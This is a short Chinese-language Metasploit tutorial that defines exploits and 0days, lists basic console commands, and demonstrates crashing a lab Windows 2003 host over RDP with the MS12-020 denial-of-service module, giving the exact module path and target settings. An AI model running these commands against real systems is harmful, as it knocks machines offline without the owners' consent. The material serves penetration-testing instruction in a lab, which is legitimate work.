漏洞利用是指由滲透測試者利用一個系統、應用或者服務中的安全漏洞進行的攻擊行為。流行的滲透攻擊技術包括緩沖區溢出、Web應用程序攻擊,以及利用配置錯誤等,其中包含攻擊者或測試人員針對系統中的漏洞而設計的各種POC驗證程序,用於破壞系統安全性的攻擊代碼,每個漏洞都有相應的攻擊代碼。
每個操作系統都會存在各種Bug,想Windows這樣有版權的操作系統,微軟公司會很快的開發針對這些Bug的補丁供用戶更新。全世界有大量的漏洞研究人員夜以繼日的發現、研究新的Bug,這些沒有公布補丁的Bug就是所謂的0day,0day對網絡安全的威脅是巨大的。
metasploit常用漏洞利用命令:
search <name>
# 用指定關鍵字搜索可利用模塊
use <exploit name>
# 使用漏洞
show options
# 顯示可配置參數
set <OPTION NAME> <option>
# 設置選項
show payloads
# 顯示可利用攻擊載荷
下面以MS12-020漏洞來演示漏洞利用模塊的使用。
MS12-020全稱Microsoft Windows遠程桌面協議RDP遠程代碼執行漏洞,MS12-020漏洞利用:
本機:kali 192.168.2.135
靶機:windows 2003 192.168.2.134
首先搜索可利用模塊。
search ms12-020
這里選擇:auxiliary/dos/windows/rdp/ms12_020_maxchannelids
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
設置目標機參數,這里默認就是3389,所以不用修改:
set RHOST 192.168.2.134 set RPORT 3389
輸入“run”或者“exploit”進行攻擊。
這時候發現目標機已經藍屏,直接被我們秒殺。。。
